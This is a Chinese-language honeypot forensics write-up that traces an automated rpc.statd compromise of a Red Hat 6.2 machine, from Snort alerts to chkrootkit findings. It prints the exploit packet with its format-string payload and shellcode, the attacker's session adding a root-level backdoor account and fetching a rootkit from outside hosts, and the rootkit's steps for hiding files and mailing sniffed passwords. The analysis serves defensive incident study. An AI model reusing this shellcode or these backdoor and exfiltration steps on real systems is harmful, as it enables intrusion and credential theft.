| 关键词: usr lib 蜜罐 00 var httpd 一个 root 黑客 文件 |
蜜罐的操作系统: Redhat 6.2 x86 Vanilla蜜罐连上互联网不到三个星期就被入侵了。设置了几个典型的守程(daemon)等待被渗透。我检查了Snort的预警报告就意识到有人企图渗透了,几个"RPC portmap request status",表明有查询发送到了portmap daemon,是为了查询关于status服务的信息,这些向来都是黑客入侵前的查点。 参考: SID 587参考: arachNIDS很明显,离最初的警报不久,渗透就发生了。Shellcode就是已在互联网上公布的由ron1n写的 statdx.c. 具体是针对Linux IA32 平台的,溢出成功后会绑定一个root shell在39168端口(port 39168 and 133 bytes)。 参考: SID 600参考: arachNIDS参考: Bugtraq根据渗透痕迹可以发现这是一个autorooter的自动攻击(蠕虫), 整个进程都是自动的,从扫描,分析确定服务(版本),直到溢出渗透。 下面就是整个过程的一些纪录,时间格式按照 小时:分:秒 。 18:58:07 - 66.206.21.1 sends SYN to honeypot on port 11118:58:07 - honeypot responds SYN/ACK to 66.206.21.118:58:07 - 66.206.21.1 sends ACK to honeypot (典型的三次握手)18:58:08 - 66.206.21.1 sends "RPC GETPORT Call" to honeypot (对RPC的查点)18:58:08 - honeypot sends "RPC GETPORT Reply" to 66.206.21.1 indicating its RPC port is listening on UDP 933 (返回了RPC的监听端口UDP 933)18:58:08 - 66.206.21.1 sends "STAT" to UDP 933 of honeypot attempting to buffer overflow rpc.statd18:58:10 - 66.206.21.1 sends "STAT" to UDP 933 of honeypot attempting to buffer overflow rpc.statd18:58:12 - 66.206.21.1 sends "STAT" to UDP 933 of honeypot attempting to buffer overflow rpc.statd (连续三次对UDP 933端口发送溢出数据)认为这是一个 autorooter 就是因为我不相信有人会连续三次,而且都是准确地每隔两秒发送一个exploit的。 0000 00 80 c8 48 22 b7 00 06 2a cf f0 70 08 00 45 00 ..菻"?. *橡p..E.0010 04 50 00 00 40 00 32 11 24 2f 42 ce 15 01 44 75 [email protected]. $/B?.Du0020 84 2a e7 e6 03 a5 04 3c 87 8d 2d c1 b2 86 00 00 .*珂.?0030 00 00 00 00 00 02 00 01 86 b8 00 00 00 01 00 00 ........ .?.....0040 00 01 00 00 00 01 00 00 00 20 3d e4 19 44 00 00 ........ . =?D..0050 00 09 6c 6f 63 61 6c 68 6f 73 74 00 00 00 00 00 ..localh ost.....0060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ........ ........0070 00 00 00 00 03 e7 18 f7 ff bf 18 f7 ff bf 19 f7 .....???????0080 ff bf 19 f7 ff bf 1a f7 ff bf 1a f7 ff bf 1b f7 ??????????0090 ff bf 1b f7 ff bf 25 38 78 25 38 78 25 38 78 25 ????8 x%8x%8x%00a0 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x %8x%8x%800b0 78 25 32 33 36 78 25 6e 25 31 33 37 78 25 6e 25 x%236x%n %137x%n%00c0 31 30 78 25 6e 25 31 39 32 78 25 6e 90 90 90 90 10x%n%19 2x%n....(0x90 NOPs)03c0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ........ ........03d0 90 90 90 90 90 90 90 90 31 c0 eb 7c 59 89 41 10 ........ 1离|Y.A.03e0 89 41 08 fe c0 89 41 04 89 c3 fe c0 89 01 b0 66 .A.?.A. .摸?.癴03f0 cd 80 b3 02 89 59 0c c6 41 0e 99 c6 41 08 10 89 ??.Y.?A..艫...0400 49 04 80 41 04 0c 88 01 b0 66 cd 80 b3 04 b0 66 I..A.... 癴??癴0410 cd 80 b3 05 30 c0 88 41 04 b0 66 cd 80 89 ce 88 ??0?A .癴?.?0420 c3 31 c9 b0 3f cd 80 fe c1 b0 3f cd 80 fe c1 b0 ?砂???涟????0430 3f cd 80 c7 06 2f 62 69 6e c7 46 04 2f 73 68 41 ???/bi n荈./shA0440 30 c0 88 46 07 89 76 0c 8d 56 10 8d 4e 0c 89 f3 0?F..v. .V..N..?0450 b0 0b cd 80 b0 01 cd 80 e8 7f ff ff ff 00 ???? ????.溢出成功后,黑客连接上绑定在39168端口的一个rootshell,然后增加了两个用户kernel和httpd,其中kernel用户是uid/gid都是0的,这就意味着它有跟root同等高的权限。 cd /; uname -a; id;Linux test 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknownuid=0 (root) gid=0 (root)w5:27pm up 51 days, 10:16, 2 users, load average: 0.00, 0.00, 0.00USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATroot tty1 - 6Oct 2 42:28m 27:28 27:27 /usr/local/bin/root tty2 - 16Nov 2 5days 0.25s 0.14s -bash/usr/sbin/adduser -g 0 -u 0 kernelpasswd kernelNew UNIX password: lordlukeRetype new UNIX password: lordlukeChanging password for user kernelpasswd: all authentication tokens updated successfully/usr/sbin/adduser httpdpasswd httpdNew UNIX password: lordlukeRetype new UNIX password: lordlukeChanging password for user httpdpasswd: all authentication tokens updated successfully接着黑客就断开了这个rootshell,通过telnet来登陆系统。有趣的是攻击的主机和telnet登陆系统的客户端主机不是同一个IP。让我们用 p0f 来看看对方是什么系统。p0f 是一个十分简洁的工具可以鉴别远程系统版本,WHOIS查询结果也如下给出了。 主机 A - 执行攻击脚本p0f 查询结果: 66.206.21.1 [15 hops]: Linux 2.4.2 - 2.4.14 (1) [whois.arin.net]OrgName: Cyber World Internet ServicesOrgID: CWISNetRange: 66.206.0.0 - 66.206.31.255CIDR: 66.206.0.0/19NetName: CYBERWORLD-INTNetHandle: NET-66-206-0-0-1Parent: NET-66-0-0-0-0NetType: Direct AllocationNameServer: NS0.NIC-REG-DNS.COMNameServer: NS1.NIC-REG-DNS.COMComment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLERegDate: 2001-12-04Updated: 2002-03-08TechHandle: AS1239-ARINTechName: Slocombe, AlvinTechPhone: +1-509-343-2100TechEmail: [email protected]# ARIN Whois database, last updated 2002-11-29 19:05# Enter ? for additional hints on searching ARIN's Whois database.主机 B - 通过telnet登陆蜜罐p0f 查询结果: 80.97.35.83 [24 hops]: Windows 9x (1) * [whois.ripe.net]% This is the RIPE Whois server.% The objects are in RPSL format.%% Rights restricted by copyright.% Seehttp://www.ripe.net/ripencc/pub-services/db/copyright.htmlinetnum: 80.97.35.0 - 80.97.35.127netname: EUROSATdescr: SC EUROSAT SRLdescr: Str.Gen.Dragalina Nr.2Adescr: Jud.Caras-Severindescr: 1650 Caransebescountry: roadmin-c: TP3713-RIPEtech-c: MB10985-RIPEstatus: ASSIGNED PAmnt-lower: AS3233-MNTmnt-by: AS3233-MNTmnt-routes: AS12302-MNTnotify: [email protected]: [email protected] 20010909changed: [email protected] 20020104source: RIPEroute: 80.97.32.0/20descr: Mobifon S.A.descr: Romaniaorigin: AS12302notify: [email protected]: AS12302-MNTchanged: [email protected] 20020412source: RIPEperson: Traian Plesaaddress: SC EUROSAT SRLaddress: Str.Gen.Dragalina Nr.2Aaddress: Caransebesaddress: ROaddress: Postal Code: 1650address: Registration/ID Number: J11/1287/1992address: Fiscal Code: R3060228phone: +40-255-516318fax-no: +40-255-516318e-mail: [email protected]: TP3713-RIPEnotify: [email protected]: AS3233-MNTchanged: [email protected] 20010909changed: [email protected] 20021001source: RIPEperson: Marius Budaaddress: SC EUROSAT SRLaddress: Str.Gen.Dragalina Nr.2Aaddress: Caransebesaddress: ROaddress: 1650phone: +40-744-500895fax-no: +40-255-516318e-mail: [email protected]: MB10985-RIPEnotify: [email protected]: AS3233-MNTchanged: [email protected] 20010909changed: [email protected] 20021001source: RIPE让我做一个有根据的猜测,主机A应该是一个被入侵占领了的肉鸡,被安装了自动攻击程序,负责扫描和入侵其他有漏洞的主机。主机B可能也是被入侵占领了的肉鸡,但也可能是黑客自己的个人电脑,如果是后者,则这位黑客应该是个罗马尼亚人。 用新添的用户登陆蜜罐: Red Hat Linux release 6.2 (Zoot)Kernel 2.2.14-5.0 on an i586login: kernelPassword:Login incorrectlogin: httpdPassword:[httpd@test httpd]$ su kernelPassword:[root@test httpd]# w5:29pm up 51 days, 10:18, 3 users, load average: 0.00, 0.00, 0.00USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATroot tty1 - 6Oct 2 42:30m 27:28 27:27 /usr/local/bin/root tty2 - 16Nov 2 5days 0.25s 0.14s -bashhttpd pts/0 80.97.35.83 5:29pm 0.00s 0.61s ? -[root@test httpd]# wget www.geocities.com/ozlamer/psybnc.tgzbash: wget: command not found[root@test httpd]# rpm -ivh --forceftp://ftp.intraware.com/pub/wget/wget-1_5_3-1_i386.rpmRetrievingftp://ftp.intraware.com/pub/wget/wget-1_5_3-1_i386.rpmerror: skippingftp://ftp.intraware.com/pub/wget/wget-1_5_3-1_i386.rpm - transfer failed - Unknown or unexpected errorwarning: u 0x813af50 ctrl 0x813fd40 nrefs != 0 (ftp.intraware.com ftp)[root@test httpd]# clear[root@test httpd]# ftp 209.139.200.32Connected to 209.139.200.32.220 Serv-U FTP Server v3.0 for WinSock ready...Name (209.139.200.32:httpd): dels331 User name okay, need password.Password:230 User logged in, proceed.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd .web250 Directory changed to /.webftp> get r.tgzlocal: r.tgz remote: r.tgzPORT Command successful.150 Opening BINARY mode data connection for r.tgz (3607329 bytes).226 Transfer complete.3607329 bytes received in 77.6 secs (45 Kbytes/sec)ftp> bye221 Goodbye![root@test httpd]# tar zxvf r.tgzoutput[root@test httpd]# rm -rf r.tgz[root@test httpd]# cd X[root@test X]# ./install operator akteam 54321output[root@test X]# wgetbash: wget: command not found[root@test X]# cd ..[root@test httpd]# rm -rf X[root@test httpd]# exit[httpd@test httpd]$ exitlogout从这里可以看出,黑客企图创建一个IRC代理,psybnc,一般用来做跳板的,不过没有成功。一个ssh后门连同rootkit被安装了,日志被擦掉,系统文件也被替换了。ssh服务监听54321端口,黑客下次就利用这个加密过的安全通道连接蜜罐。接着他又重新下载安装了另一个rootkit,(负责)扫描 /8 范围内网络里的22(ssh)和111(portmapper),这两个端口有着多个安全漏洞可让黑客得到rootshell,如此大的范围包括了目标主机16,777,214台,不容小视。当然,这样的扫描并没有得逞,蜜罐的典型设置 transparent bridge ,专门负责数据包过滤功能,将这样的恶意扫描拦截了。 有趣的是,第二个rootkit默认是通过发送email的形式把被占领的主机信息传送给黑客的,这样的信息包括了ifconfig的输出(为了得到IP地址),嗅听得到的各种用户密码(包括来自console登陆的)。因为蜜罐的 transparent bridge 把通向外面的包过滤了,黑客yahoo.com的邮件发送不出去,所以他又测试性地发送了另一封email,这个邮件地址推测就是黑客工作地方的服务器。 一些文件接着被下载到了蜜罐里,通过tcpdump的纪录文件,我们重新集成复原出了这些文件具体如下“I used tcpslice to combine multiple tcpdump style log files into one. Then I used ethereal to load the capture and specify the filter "tcp.port eq 20 and not tcp.checksum_bad", chose relevant ftp session, chose Follow TCP Stream option, and saved the file”(这个方法没有具体实践过,所以也翻译不清楚,就自己看原文吧)。r.tgz SSH Backdoor Server By Akamai-Teamsrk3.tar Sin Rootkit 3.0nebunu.tgz+ |-apache Bash wrapper to exploit Apache using httpdtype and openssl |-httpdtype determines type of web server running on a host |-open OpenSSL remote apache exploit for BSD |-openssl OpenSSL remote exploit |-pinky variant of apache |-root FTPD MassRooter |-scanssl OpenSSL vulnerability scanner |-script Bash wrapper for apache taking ip as argument |-start wrapper for root but substitutes port 443 for 21 (!) haos.tgz+ |-libpcap-0.6.2 libpcap |-.i.c scans arbitrary port(s) of all users on a specified IRC channel |-.ii.c same as .i.c but with different #define of IRC server |-.iii.c same as .i.c but with different #define of IRC server |-.iiii.c same as .i.c but with different #define of IRC server |-.ip reads .sv and performs SSH exploit using Denyed(2) |-.s.c arbitrary TCP port scanner |-.sv 0-length file |-.v SSH version mapper |-.x SSH autorooter utilizing Denyed(2) |-h= one domain name pointer (possible vulnerable host?) |-hh= one domain name pointer (possible vulnerable host?) |-targets.txt SSH offsets |-targets SSH offsets |-Denyed(1) autoroot wrapper for 7350wurm |-Denyed(2) SSH exploit |-dat1 wrapper for dat2 |-dat2 rpc.statd exploit |-haosv HTTP version identifier |-haosx wrapper for dat1 |-haosp arbitrary TCP port scanner |-FTP FTPD autorooter |-7350wurm wu-ftpd exploit flood.tgz+ |-broadcast.txt list of smurf amplifiers |-juno DoS tool |-madscan.c finds smurf amplifiers |-slice2 DoS tool |-smurf6-linux+LPG.c DoS tool utilizing smurf amplifiers |-vadimI DoS tool |-vadimI.c truncated binary |-vadimII.c DoS tool所有黑客下载到蜜罐的文件都有一个共同的特点,就是用于扫描和渗透其他有漏洞的主机。这样做的目的不能确定,可能是为了建立一群用于DDoS的肉鸡,因为里面有几个非常不错的用于DoS的工具。 其中 Sin Rootkit 是另一个简单的rootkit,因为它的安装脚本是 shell script 格式的,我们可以看看它是怎么运行的: - unset HISTFILE- chattr -iau of files to be modified whichs removes immutable, append and undeletable attribute flags - remove /var/lock/subsys/atd and kill atd- replace syslogd with trojaned copy- stop syslog and restart it- copy list of processes to not show to /dev/ttyop- copy list of ports and ip addresses to not show to /dev/ttyoa- copy list of filenames to not list to /dev/ttyof- copy list of lognames to not log to /dev/ttyos- touch -acmr trojaned binaries to system binaries which sets correct access and modification time- chmod +s chsh which sets user or group ID on execution and replace chsh- replace system binaries with trojaned binaries- chkconfig --add atd and link trojaned atd SysV init to system atd SysV init- install DoS tools in /usr/bin/- install linsniffer, which sniffs usernames and passwords for popular protocols- install sshd backdoor- replace either xinetd or inet with trojaned copy, chkconfig --add inet and restart inet- add crontab entry to email ifconfig output, hostname and sniffed traffic to author (attacker is supposed to change this email address, author gets a treat if not done)- check for other rootkits- send email with sysinfo to the author- start syslog- clean text in current logs- chattr +i of modified files which adds immutable flag里面的 /dev/ttyo{p,a,f,s} 文件用于掩盖后门痕迹的,这是 rootkit 典型的 做法,比如你对被替换后的netstat使用strings命令就可以看到/dev/ttyoa。 我们可以对还在运行的蜜罐也做一些检查,有一个工具叫 chkrootkit,可以找出已经被安装的 rootkit,具体的原理就是察看各种已知rootkit的各种痕迹找出它。下面是chkrootkit的静态参数下的输出结果: #./chkrootkit -qChecking `chsh'... INFECTEDChecking `ifconfig'... INFECTED/dev/.haos/haos1/.f/Denyed/usr/lib/perl5/5.00503/i386-linux/.packlist /usr/lib/perl5/site_perl/5.005/i386-linux/auto/MD5/.packlist /usr/lib/perl5/site_perl/5.005/i386-linux/auto/mod_perl/.packlist /usr/lib/perl5/site_perl/5.005/i386-linux/auto/Irssi/.packlist /usr/lib/perl5/site_perl/5.005/i386-linux/auto/Irssi/Irc/.packlist /usr/lib/perl5/site_perl/5.005/i386-linux/auto/Irssi/UI/.packlist /usr/lib/perl5/site_perl/5.005/i386-linux/auto/Irssi/TextUI/.packlist /usr/lib/linuxconf/install/gnome/.directory /usr/lib/linuxconf/install/gnome/.order /usr/lib/.lib /usr/lib/sn/.X /usr/lib/sn/.sys /usr/lib/ld/.X /usr/man/man1/... /usr/man/man1/.../.m /usr/man/man1/.../.w /lib/modules/2.2.14-5.0/.rhkmvtagPossible t0rn rootkit installedeth0 is PROMISCuser root deleted or never loged from lastlog!chkrootkit检查判断出 chsh 和ifconfig文件已经被木马替换了,还查出有一个文件在 /dev (/dev/.haos/haos1/.f/Denyed)看起来似乎不太正常,还找到其他几个可疑的目录和文件: /usr/lib/.lib /usr/lib/sn/.X/usr/lib/sn/.sys/usr/lib/ld/.X/usr/man/man1/.../usr/man/man1/.../.m/usr/man/man1/.../.w看一下过去七天里改动过的文件,可以看出蜜罐有过什么样的改动,当然,作为一个正常的系统,大量合法的文件也被改动过。 # find / -type f -mtime -7 | grep -v proc/var/lib/slocate/slocate.db/var/lib/logrotate.status/var/log/lastlog/var/log/httpd/error_log/var/log/httpd/access_log/var/log/wtmp/var/log/sendmail.st/var/log/secure/var/log/maillog/var/log/spooler/var/log/xferlog/var/log/boot.log/var/log/cron/var/log/messages.1/var/log/maillog.1/var/log/cron.1/var/run/utmp/var/run/syslogd.pid/var/run/inetd.pid/var/run/sshd2_54321.pid/var/run/sshd.pid/var/spool/mail/root/var/spool/anacron/cron.daily/var/spool/anacron/cron.weekly/var/spool/mqueue/qfRAA31158/var/spool/mqueue/qfOAA08951/var/spool/mqueue/dfRAA31158/var/spool/mqueue/qfRAA31317/var/spool/mqueue/dfRAA31317/var/spool/mqueue/qfRAA31852/var/spool/mqueue/dfOAA08951/var/spool/mqueue/dfRAA31852/var/spool/mqueue/qfOAA08957/var/spool/mqueue/dfOAA08957/var/tmp/rpm-xfer.c4TACW/tmp/info_tmp/dev/sbin/system/dev/.haos/haos2/.f/.s/dev/.haos/haos2/.f/.sv/dev/.haos/haos2/.f/h/dev/.haos/dos/juno/dev/.haos/arhive/flood.tgz/usr/lib/perl5/man/whatis/usr/lib/libc/libp/usr/lib/libc/libto/usr/lib/libc/libpt/usr/lib/libc/liblsf/usr/lib/libc/liblst/usr/lib/libc/libifc/usr/lib/libc/libph/usr/lib/libc/libif/usr/lib/libc/libah/usr/lib/.lib/libdi/usr/lib/.lib/libne/usr/lib/.lib/libloc/usr/lib/.lib/libdu/usr/lib/.lib/libvd/usr/lib/.lib/liblo/usr/lib/.lib/libnh/usr/lib/.lib/libfh/usr/lib/sn/.X/usr/lib/sn/.sys/usr/lib/ld/.X/usr/lib/ld/chat/usr/man/whatis/usr/X11R6/man/whatis/usr/bin/irqd/usr/info/.t0rn/shdcf/usr/info/.t0rn/shrs/usr/local/man/whatis/usr/src/.puta/.1addr/usr/src/.puta/.1file/usr/src/.puta/.1logz/usr/src/.puta/system/etc/group/etc/passwd/etc/rc.d/rc1.d/etc/rc.d/rc1.d/rc.tgz/etc/rc.d/rc.sysinit/etc/passwd-/etc/shadow-/etc/shadow/etc/gshadow/etc/passwd.OLD/etc/ttyhash/etc/psdevtab/bin/login/home/httpd/.emacs/home/httpd/.bash_logout/home/httpd/.bash_profile/home/httpd/.bashrc/home/httpd/.screenrc/home/kernel/.emacs/home/kernel/.bash_logout/home/kernel/.bash_profile/home/kernel/.bashrc/home/kernel/.screenrc/home/kernel/.bash_history/ /rs/.haos/dos/juno为了对蜜罐做更深一步的研究,可以对磁盘做一个镜像,然后拿到其他机子上细细分析。用UNIX自带的一个工具dd,就能做到bit-by-bit的拷贝,不推荐使用tar或者rsync做备份,因为根据后两者的工作原理,有三种信息(slack space at the end of files, unused inode information and empty space in the filesystem(refer phrack 59))将不被纪录而丢失,然而黑客可能就使用了它们来隐藏文件,放在这些地方的文件将不能被检测出来。做好了镜像,再使用read-only,nodev,noexec参数挂上来做分析。 最后总结来说,这样的入侵每天都会在互联网上发生,一旦被入侵,黑客会放很多乱七八糟的东西到你硬盘上,最好的方法也就是擦干净你的硬盘重新安装一个系统了。至于如何防范,我只能说请安装最新的系统漏洞补丁,使用象Snort这样的入侵检测软件,还有文件完整检测软件Samhain 主机入侵检测软件 AIDE. |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|